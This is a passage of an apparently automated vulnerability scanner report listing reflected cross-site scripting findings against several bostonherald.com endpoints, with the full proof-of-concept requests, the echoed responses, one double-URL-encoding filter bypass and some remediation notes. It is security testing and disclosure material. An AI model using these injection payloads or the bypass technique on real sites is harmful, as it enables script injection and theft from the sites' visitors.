Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:40:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2148
Content-Type: text/html; charset=UTF-8
Connection: close


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
CROLLING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottoma67b1</script><script>alert(1)</script>4ab8f6765b0!x14">
...[SNIP]...

2.13. http://www.bostonherald.com/includes/processAds.bg [companion parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /includes/processAds.bg

Issue detail

The value of the companion request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc2d1"><script>alert(1)</script>6c821273efd was submitted in the companion parameter. This input was echoed as bc2d1\"><script>alert(1)</script>6c821273efd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/processAds.bg?position=x14&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottombc2d1"><script>alert(1)</script>6c821273efd&page=bh.heraldinteractive.com%2Fhome HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:40:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2112
Content-Type: text/html; charset=UTF-8
Connection: close


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottombc2d1\"><script>alert(1)</script>6c821273efd!x14">
...[SNIP]...

2.14. http://www.bostonherald.com/includes/processAds.bg [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /includes/processAds.bg

Issue detail

The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea775"><script>alert(1)</script>9030106f1a6 was submitted in the page parameter. This input was echoed as ea775\"><script>alert(1)</script>9030106f1a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/processAds.bg?position=x14&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhomeea775"><script>alert(1)</script>9030106f1a6 HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:40:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2112
Content-Type: text/html; charset=UTF-8
Connection: close


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/homeea775\"><script>alert(1)</script>9030106f1a6@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x14">
...[SNIP]...

2.15. http://www.bostonherald.com/includes/processAds.bg [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /includes/processAds.bg

Issue detail

The value of the page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37376%2527%253balert%25281%2529%252f%252fe6f611bda68 was submitted in the page parameter. This input was echoed as 37376';alert(1)//e6f611bda68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the page request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /includes/processAds.bg?position=x14&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome37376%2527%253balert%25281%2529%252f%252fe6f611bda68 HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:40:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2016
Content-Type: text/html; charset=UTF-8
Connection: close


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
'HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/home37376';alert(1)//e6f611bda68@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x14">
...[SNIP]...

2.16. http://www.bostonherald.com/includes/processAds.bg [position parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /includes/processAds.bg

Issue detail

The value of the position request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7107c</script><script>alert(1)</script>2ef88115157 was submitted in the position parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/processAds.bg?position=x147107c</script><script>alert(1)</script>2ef88115157&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:40:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2143
Content-Type: text/html; charset=UTF-8
Connection: close


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
LING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x147107c</script><script>alert(1)</script>2ef88115157">
...[SNIP]...

2.17. http://www.bostonherald.com/includes/processAds.bg [position parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /includes/processAds.bg

Issue detail

The value of the position request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6b75"><script>alert(1)</script>72445af01e was submitted in the position parameter. This input was echoed as a6b75\"><script>alert(1)</script>72445af01e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/processAds.bg?position=x14a6b75"><script>alert(1)</script>72445af01e&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:40:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2101
Content-Type: text/html; charset=UTF-8
Connection: close


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x14a6b75\"><script>alert(1)</script>72445af01e">
...[SNIP]...

2.18. http://www.bostonherald.com/mediacenter/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b77b'-alert(1)-'44e32132f58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mediacenter/?7b77b'-alert(1)-'44e32132f58=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:23:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 450978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Photos & Video - Boston
...[SNIP]...
<script type="text/javascript">
            // For pop-up windows in Now Playing pane
            hide_id = 0;
               
            // Converts the GET params to a JSON object
               mcParams = '7b77b'-alert(1)-'44e32132f58=1'.toQueryParams();
               
               //alert(Object.inspect(mcParams));
               
               function updateData(key,val) {
                   
                   // update paramaters JSON
                   mcParams[key] = val;
                   
                   // Show loadi
...[SNIP]...

2.19. http://www.bostonherald.com/mediacenter/video.php [bc_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The value of the bc_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59ff3"><script>alert(1)</script>0e6ae86ba81 was submitted in the bc_id parameter. This input was echoed as 59ff3\"><script>alert(1)</script>0e6ae86ba81 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024&title=Sidewalk%20snow%20woes&width=370&height=300&bc_id=76678385900159ff3"><script>alert(1)</script>0e6ae86ba81&rand=408 HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:40:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2577
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
<object id="myExperience76678385900159ff3\"><script>alert(1)</script>0e6ae86ba81" class="BrightcoveExperience">
...[SNIP]...

2.20. http://www.bostonherald.com/mediacenter/video.php [height parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The value of the height request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6d42"><script>alert(1)</script>dad1887e031 was submitted in the height parameter. This input was echoed as e6d42\"><script>alert(1)</script>dad1887e031 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024&title=Sidewalk%20snow%20woes&width=370&height=300e6d42"><script>alert(1)</script>dad1887e031&bc_id=766783859001&rand=408 HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:40:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2577
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
<param name="height" value="300e6d42\"><script>alert(1)</script>dad1887e031" />
...[SNIP]...

2.21. http://www.bostonherald.com/mediacenter/video.php [media_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The value of the media_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da509</script><script>alert(1)</script>08312a85049 was submitted in the media_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024da509</script><script>alert(1)</script>08312a85049&title=Sidewalk snow woes&width=370&height=300&bc_id=766783859001&rand=408 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:01:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2639
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
se");

    tmObj.set("VideoURL", "http://www.bostonherald.com/mediacenter/retrieve_video.php?redirect=http%3A%2F%2Fmultimedia.bostonherald.com%2Fvideo%2F20110127%2F012711snowar.flv&video_id=2024da509</script><script>alert(1)</script>08312a85049");
tmObj.set("VideoTitle", "Sidewalk");
tmObj.set("Category", "");

           // Default slate image
           // http://cache.heraldinteractive.com/images/version5.0/site_images/click_to_pla
...[SNIP]...

2.22. http://www.bostonherald.com/mediacenter/video.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 521f5</script><script>alert(1)</script>224f4942aaa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024&title=Side/521f5</script><script>alert(1)</script>224f4942aaawalk snow woes&width=370&height=300&bc_id=766783859001&rand=408 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:04:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2640
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
http://www.bostonherald.com/mediacenter/retrieve_video.php?redirect=http%3A%2F%2Fmultimedia.bostonherald.com%2Fvideo%2F20110127%2F012711snowar.flv&video_id=2024");
tmObj.set("VideoTitle", "Side/521f5</script><script>alert(1)</script>224f4942aaawalk");
tmObj.set("Category", "");

           // Default slate image
           // http://cache.heraldinteractive.com/images/version5.0/site_images/click_to_play.jpg
           
           tmObj.set("PreviewImageUR
...[SNIP]...

2.23. http://www.bostonherald.com/mediacenter/video.php [program_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The value of the program_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73056</script><script>alert(1)</script>1e86b062507 was submitted in the program_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed626973056</script><script>alert(1)</script>1e86b062507&media_id=2024&title=Sidewalk snow woes&width=370&height=300&bc_id=766783859001&rand=408 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:01:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2689
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
ia.bostonherald.com/video/20110127/012711snowar.flv.jpg");
           tmObj.set("EndSlateURL","http://multimedia.bostonherald.com/video/20110127/012711snowar.flv.jpg");
       
           
           tmObj.start('4c6ebfbed626973056</script><script>alert(1)</script>1e86b062507'); // Set in Acudeo Console
           
           // 49ee2ce0476b3 -- incl bottom companion ad
</script>
...[SNIP]...

2.24. http://www.bostonherald.com/mediacenter/video.php [program_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The value of the program_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc846"><script>alert(1)</script>a2e44a869d6 was submitted in the program_id parameter. This input was echoed as cc846\"><script>alert(1)</script>a2e44a869d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269cc846"><script>alert(1)</script>a2e44a869d6&media_id=2024&title=Sidewalk snow woes&width=370&height=300&bc_id=766783859001&rand=408 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:00:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2677
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/4c6ebfbed6269cc846\"><script>alert(1)</script>a2e44a869d6_p.js">
...[SNIP]...

